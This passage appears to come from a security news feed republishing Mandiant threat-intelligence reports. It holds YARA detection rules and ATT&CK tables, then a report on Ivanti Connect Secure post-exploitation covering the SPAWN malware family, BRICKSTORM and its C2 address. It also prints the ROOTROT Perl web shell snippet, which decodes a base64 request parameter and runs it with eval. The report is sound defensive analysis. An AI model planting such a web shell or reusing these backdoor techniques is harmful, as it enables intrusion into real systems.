                $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 
[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }
                $str1 = "--[foreground|fingerprint|proxy|process_name] 
-d|--destination &lt;server_address&gt;"
                $str2 = "-d or --destination Server connect back address 
(can be baked in)"
                $str3 = "--foreground Causes the client to run without 
forking to background"
                $str4 = "--fingerprint Server public key SHA256 hex 
fingerprint for auth"
                $str5 = "--proxy Location of HTTP connect proxy to use"
                $str6 = "--process_name Process name shown in 
tasklist/process list"
        condition:
                ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) 
or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) 
== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d 
and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) 
and (all of ($str*) or all of ($cc_*))
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_SNOWLIGHT_1 
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect 
the SNOWLIGHT code family"
                md5 = "0951109dd1be0d84a33d52c135ba9c97"
                platforms = "Linux"
                malware_family = "SNOWLIGHT"
        strings:
                $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 
7C F2 48 63 D2 48 89 EE 44 89 E7 }
                $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 
00 BF 3F 01 00 00 E8 8C FE FF FF }	
        condition:
                uint32(0) == 0x464c457f and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-917</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-916</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-059</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-056</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MITRE ATT&amp;CK</h2>
<p>Mandiant has observed UNC5174 use the following techniques:</p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1140</span></p>
</td>
<td>
<p><span>Deobfuscate/Decode Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1222.002</span></p>
</td>
<td>
<p><span>Linux and Mac File and Directory Permissions Modification</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1601.001</span></p>
</td>
<td>
<p><span>Patch System Image</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1049</span></p>
</td>
<td>
<p><span>System Network Connections Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1105</span></p>
</td>
<td>
<p><span>Ingress Tool Transfer</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1572</span></p>
</td>
<td>
<p><span>Protocol Tunneling</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1573.002</span></p>
</td>
<td>
<p><span>Asymmetric Cryptography</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059</span></p>
</td>
<td>
<p><span>Command and Scripting Interpreter</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.004</span></p>
</td>
<td>
<p><span>Unix Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1136.001</span></p>
</td>
<td>
<p><span>Local Account</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1531</span></p>
</td>
<td>
<p><span>Account Access Removal</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003.008</span></p>
</td>
<td>
<p><span>/etc/passwd and /etc/shadow</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1608.003</span></p>
</td>
<td>
<p><span>Install Digital Certificate</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><br>Mandiant has observed UNC302 use the following techniques:<br><br></span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1133</span></p>
</td>
<td>
<p><span>External Remote Services</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1189</span></p>
</td>
<td>
<p><span>Drive-by Compromise</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Collection</span></p>
</td>
<td>
<p><span>T1213</span></p>
</td>
<td>
<p><span>Data from Information Repositories</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560</span></p>
</td>
<td>
<p><span>Archive Collected Data</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560.001</span></p>
</td>
<td>
<p><span>Archive via Utility</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1505.003</span></p>
</td>
<td>
<p><span>Web Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1036</span></p>
</td>
<td>
<p><span>Masquerading</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1112</span></p>
</td>
<td>
<p><span>Modify Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1134</span></p>
</td>
<td>
<p><span>Access Token Manipulation</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1497</span></p>
</td>
<td>
<p><span>Virtualization/Sandbox Evasion</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1529</span></p>
</td>
<td>
<p><span>System Shutdown/Reboot</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059.003</span></p>
</td>
<td>
<p><span>Windows Command Shell</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.005</span></p>
</td>
<td>
<p><span>Visual Basic</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1203</span></p>
</td>
<td>
<p><span>Exploitation for Client Execution</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1012</span></p>
</td>
<td>
<p><span>Query Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1057</span></p>
</td>
<td>
<p><span>Process Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1518</span></p>
</td>
<td>
<p><span>Software Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003</span></p>
</td>
<td>
<p><span>OS Credential Dumping</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Lateral Movement</span></p>
</td>
<td>
<p><span>T1021.001</span></p>
</td>
<td>
<p><span>Remote Desktop Protocol</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1583.003</span></p>
</td>
<td>
<p><span>Virtual Private Server</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1584</span></p>
</td>
<td>
<p><span>Compromise Infrastructure</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
<td>
<p><span>Web Protocols</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1071.004</span></p>
</td>
<td>
<p><span>DNS</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies]]></title>
<description><![CDATA[Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan

 
Since the initial disclosure of CVE-2023-46805 and CVE-2024-21887 on Jan. 10, 2024, Mandiant has conducted multiple inc...]]></description>
<link>https://tsecurity.de/de/3578869/it-security-nachrichten/cutting-edge-part-4-ivanti-connect-secure-vpn-post-exploitation-lateral-movement-case-studies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578869/it-security-nachrichten/cutting-edge-part-4-ivanti-connect-secure-vpn-post-exploitation-lateral-movement-case-studies/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p><span>Since the </span><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><span>initial disclosure</span></a><span> of </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805" rel="noopener" target="_blank"><span>CVE-2023-46805</span></a><span> and </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887" rel="noopener" target="_blank"><span>CVE-2024-21887</span></a><span> on Jan. 10, 2024, Mandiant has conducted multiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's previous blog post, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence"><span>Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts</span></a><span>, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus espionage actor that Mandiant tracks as UNC5325. </span></p>
<p><span>This blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types of activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did not have the appropriate mitigation applied. </span></p>
<p><span>Mandiant has observed different types of post-exploitation activity across our incident response engagements, including lateral movement supported by the deployment of open-source tooling and custom malware families. In addition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by abusing appliance-specific functionality to achieve their objectives.</span></p>
<p><span>As of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by the vulnerabilities. We recommend that customers follow Ivanti's latest </span><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><span>patching guidance</span></a><span> and instructions to prevent further exploitation activity. In addition, Ivanti released a </span><a href="https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-policy-secure" rel="noopener" target="_blank"><span>new enhanced external integrity checker tool</span></a><span> (ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other tactics, techniques, and procedures (TTPs) observed in the wild. We also released a </span><a href="https://services.google.com/fh/files/misc/ivanti-connect-secure-remediation-hardening.pdf" rel="noopener" target="_blank"><span>remediation and hardening guide</span></a><span>, which includes recommendations.</span></p>
<p><span>Mandiant recommends customers run both the internal and the latest </span><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><span>external ICT</span></a><span> released alongside a </span><a href="https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-policy-secure" rel="noopener" target="_blank"><span>new patch</span></a><span> on April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge Ivanti for their collaboration, transparency, and ongoing support throughout this process.</span></p>
<h2><span>Clustering and Attribution</span></h2>
<p><span>Mandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893 across our incident response investigations.</span><span> In addition to suspected China-nexus espionage groups, Mandiant has also identified financially motivated actors exploiting </span><span>CVE-2023-46805 and CVE-2024-21887</span><span>, likely to enable operations such as crypto-mining. </span><span>Since the public disclosure on Jan. 10, 2024, Mandiant has observed eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are highlighting five China-nexus clusters that have conducted intrusions. </span></p>
<p><span>In February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium confidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix Netscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however Mandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.</span></p>
<h3><span>UNC5221</span></h3>
<p><a href="https://advantage.mandiant.com/actors/threat-actor--b797832d-0411-5574-b7cf-c51b22e08423" rel="noopener" target="_blank"><span>UNC5221</span></a><span> is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation"><span>previous blog post</span></a><span>, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887 following the public disclosure on Jan. 10, 2024.</span></p>
<h3><span>UNC5266</span></h3>
<p><span>Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments. </span></p>
<h3><span>UNC5330</span></h3>
<p><span>UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence.</span></p>
<p><span>Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021. </span></p>
<h3><span>UNC5337</span></h3>
<p><span>UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221. </span></p>
<h3><span>UNC5291</span></h3>
<p><span>UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that </span><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a" rel="noopener" target="_blank"><span>Volt Typhoon was targeting critical infrastructure</span></a><span> and was potentially interested in Ivanti Connect Secure devices for initial access.</span></p>
<h2><span>New TTPs and Malware</span></h2>
<p><span>Since our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain access to target environments and move laterally within them. Additionally, Mandiant has identified several new code families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these code families, several are assessed to be custom malware families; however, Mandiant has also identified the use of open-source tooling, such as SLIVER and CrackMapExec.</span></p>
<h3><span>SPAWN Malware Family</span></h3>
<p><span>During analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four distinct malware families that work closely together to create a stealthy and persistent backdoor on an infected appliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid detection. </span></p>
<p><span>Figure 1 illustrates how the SPAWN malware family operates.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/cutting-edge4-fig1.max-1000x1000.png" alt="SPAWN malware family diagram">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="hrsqd">Figure 1: SPAWN malware family diagram</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>SPAWNANT</span></h4>
<p><span>SPAWNANT</span><strong> </strong><span>is an installer that leverages a coreboot installer function to establish persistence for the SPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate </span><code>dspkginstall</code><span> installer process and exports an </span><code>sprintf</code><span> function adding a malicious code to it before redirecting a flow back to </span><code>vsnprintf</code><span>.</span></p>
<h4><span>SPAWNMOLE</span></h4>
<p><span>SPAWNMOLE is a tunneler that injects into the </span><code>web</code><span> process. It hijacks the </span><code>accept</code><span> function in the </span><code>web</code><span> process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The malware attempts to inject itself into a process named </span><code>web</code><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>The malware attempts to hijack the </span><code>accept</code><span> API from the </span><code>libc</code><span> binary within </span><code>web</code><span> process.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>The malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>The malware traffic must start with a header that contains </span><span>0xfb49e3e2</span><span> at offset </span><span>0x13</span><span> and </span><code>0x1bc38361</code><span> at offset </span><code>0x1b</code><span> of the received buffer.</span></p>
</li>
</ul>
<h4><span>SPAWNSNAIL</span></h4>
<p><span>SPAWNSNAIL (</span><code>libdsmeeting.so</code><span>) is a backdoor that listens on localhost. It is designed to run by injecting into the </span><code>dsmdm</code><span> process (process responsible for supporting mobile device management features). It creates a backdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the SPAWNMOLE tunneler to interact with SPAWNSNAIL.</span></p>
<p><span>SPAWNSNAIL's second purpose is to inject SPAWNSLOTH (</span><code>.liblogblock.so</code><span>) into </span><code>dslogserver</code><span>, a process supporting event logging on Connect Secure.</span></p>
<p><span>SPAWNSNAIL checks if its binary name is </span><code>dsmdm</code><span>; if it is running under that name, it creates two threads:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>First thread drops a hard-coded SSH host private key to </span><code>/tmp/.dskey</code><span>, configures </span><code>libssh</code><span> to use the key, and then deletes </span><code>/tmp/.dskey</code><span>. The malware binds to localhost on port 8300.</span></p>
</li>
<ol>
<li aria-level="2">
<p role="presentation"><span>The SSH server requires public key authentication.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>When starting an interactive shell session, the malware prints a banner with statistics about the system. It will print the information about the release, uptime, current time, and whether SELinux is enabled. SPAWNSNAIL then executes an interactive </span><code>bash</code><span> shell.</span></p>
</li>
</ol>
<li aria-level="1">
<p role="presentation"><span>The second thread injects a log tampering utility, SPAWNSLOTH (</span><code>/tmp/.liblogblock.so</code><span>), into the </span><code>dslogserver</code><span> process up to three times.</span></p>
</li>
</ol>
<h4><span>SPAWNSLOTH</span></h4>
<p><span>SPAWNSLOTH is a log tampering utility injected into the </span><code>dslogserver</code><span> process. It can disable logging and disable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.</span></p>
<p><span>SPAWNSLOTH uses </span><a href="https://github.com/kubo/funchook" rel="noopener" target="_blank"><span>funchook</span></a><span> to hook the </span><code>_ZN5DSLog4File3addEPKci</code><span> function (it is assumed to be a logging function of </span><code>dslogserver</code><span>). It also modifies the </span><code>g_do_syslog_servers_exist_p</code><span> symbol. This is a pointer to a global variable controlling if event logs should be forwarded to an external syslog server.</span></p>
<p><span>Finally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL backdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.</span></p>
<h3><span>Getting to the Root of It</span></h3>
<p><span>During the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a new web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a legitimate Connect Secure </span><code>.ttc</code><span> file located at </span><code>/data/runtime/tmp/tt/setcookie.thtml.ttc</code><span> by exploiting CVE-2023-46805 and CVE-2024-21887. </span><code>setcookie.thtml.ttc</code><span> is located on a writable partition on the appliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11539" rel="noopener" target="_blank"><span>CVE-2019-11539</span></a><span> and </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-8218" rel="noopener" target="_blank"><span>CVE-2020-8218</span></a><span>.</span></p>
<p><span>Figure 2 shows the code inserted into the </span><code>setcookie.thmtl.ttc</code><span> file that contains ROOTROT. The web shell can be accessed at </span><code>/dana-na/auth/setcookie.cgi</code><span>. It parses the issued decoded Base64-encoded command and executes it with </span><code>eval</code><span>. </span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>   $output .=  "&lt;/body&gt;\n\n&lt;/html&gt;\n";
        $output .= "&lt;!--\n";
        my $key = CGI::param('[REDACTED]');
        use MIME::Base64;
        if(defined($key)){
                my $arg=decode_base64("$key");
                eval($arg);
        }
        $output .= "--&gt;\n";
        } };
        if ($@) {
            $error = $context-&gt;catch($@, \$output);
            die $error unless $error-&gt;type eq 'return';
        }
    
        return $output;
    },</code></pre>
<p><span>Figure 2: Code block inserted into the <code>setcookie.thtml.ttc</code> file</span></p></div>
<div class="block-paragraph_advanced"><p><span>During the investigation, Mandiant identified that the web shell was created on the system prior to the public disclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the presence of ROOTROT by the existence of  </span><code>&lt;!--\n and --&gt;\n</code><span> at the end of the response from /</span><code>dana-na/auth/setcookie.cgi</code><span>. </span></p>
<p><span><span>As of April 3, 2024, <span>the latest external ICT will detect modifications to </span><code>setcookie.thtml.ttc</code></span>.</span></p>
<h3><span>Lateral Movement Leading to vCenter Compromise</span></h3>
<p><span>Once UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated network reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant identified that UNC5221 first moved laterally using the vCenter web console, then later using SSH. </span></p>
<p><span>After moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter, utilizing a naming convention consistent with other servers in the environment. Though the virtual machine creation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual machine.</span></p>
<p><span>Following this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM backdoor to the appliance (</span><code>/home/vsphere-ui/vcli</code><code>)</code><span>. Notably, BRICKSTORM appears to masquerade as a legitimate vCenter process, </span><code>vami-http</code><span>. </span></p>
<h4><span>BRICKSTORM</span></h4>
<p><span>BRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded C2.</span></p>
<p><span>Upon execution, BRICKSTORM checks for an environment variable, </span><code>WRITE_LOG</code><span>, to determine if the file needs to be executed as a child proce</span><span>ss.</span><span> </span><span>If th</span><span>e variable returns false or is unset, it will copy the BRICKSTORM sample from </span><code>/home/vsphere-ui/vcli </code><span>to</span><code> /opt/vmware/sbin </code><span>as </span><code>vami-httpd</code><span>. It will then execute the copied BRICKSTORM sample and terminate execution.</span></p>
<p><span> If </span><code>WRITE_LOG</code><span> is set to tru</span><span>e,</span><span> </span><span>it assumes </span><span>it is running as the correct process, deletes </span><code>/opt/vmware/sbin/vami-httpd</code><span>, and continues execution.</span></p>
<p><span>BRICKSTORM contains a separate function called </span><code>Watcher,</code><span> which contains self-monitoring functionality. If the environment variable </span><code>WORKER</code><span> </span><span>returns false or is unset, it will continue the monitoring, checking for the file </span><code>/home/vsphere-ui/vcli</code><span> and copying the contents over to </span><code>/opt/vmware/sbin/vami-httpd</code><span>. Then, it sets the appropriate environment variables and spawns the proc</span><span>es</span><span>s. The watcher process then begins monitoring the exit status of the child process.</span></p>
<p><span>If it finds the environment variable </span><code>WORKER</code><span> is set to </span><code>true</code><span>, it assumes it is a spawned worker process meant to execute the backdoor functionality and skips the remainder of the </span><code>Watcher</code><span> function.</span></p>
<p><span>BRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket address of  </span><code>wss://opra1.oprawh.workers[.]dev</code><span>. Additionally, it contains the following legitimate DNS over HTTPS (DoH) addresses.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>https://9.9.9.9/dns-query
https://45.90.28.160/dns-query
https://45.90.30.160/dns-query
https://149.112.112.112/dns-query
https://9.9.9.11/dns-query
https://1.1.1.1/dns-query
https://1.0.0.1/dns-query
https://8.8.8.8/dns-query
https://8.8.4.4/dns-query</code></pre>
<p><span>Figure 3: DNS over HTTPS addresses</span></p></div>
<div class="block-paragraph_advanced"><p><span>BRICKSTORM appears to leverage a custom Go package called </span><code>wssoft</code><span>. There is no known, publicly available Go package with this name. It appears this may be the main package developed by the malware authors to perform task processing and connection handling for the malware.</span></p>
<p><span>Table 1 provides the four core functions provided by </span><code>wssoft</code><span>.<br><br></span></p>
<div align="left">
<div>
<div>
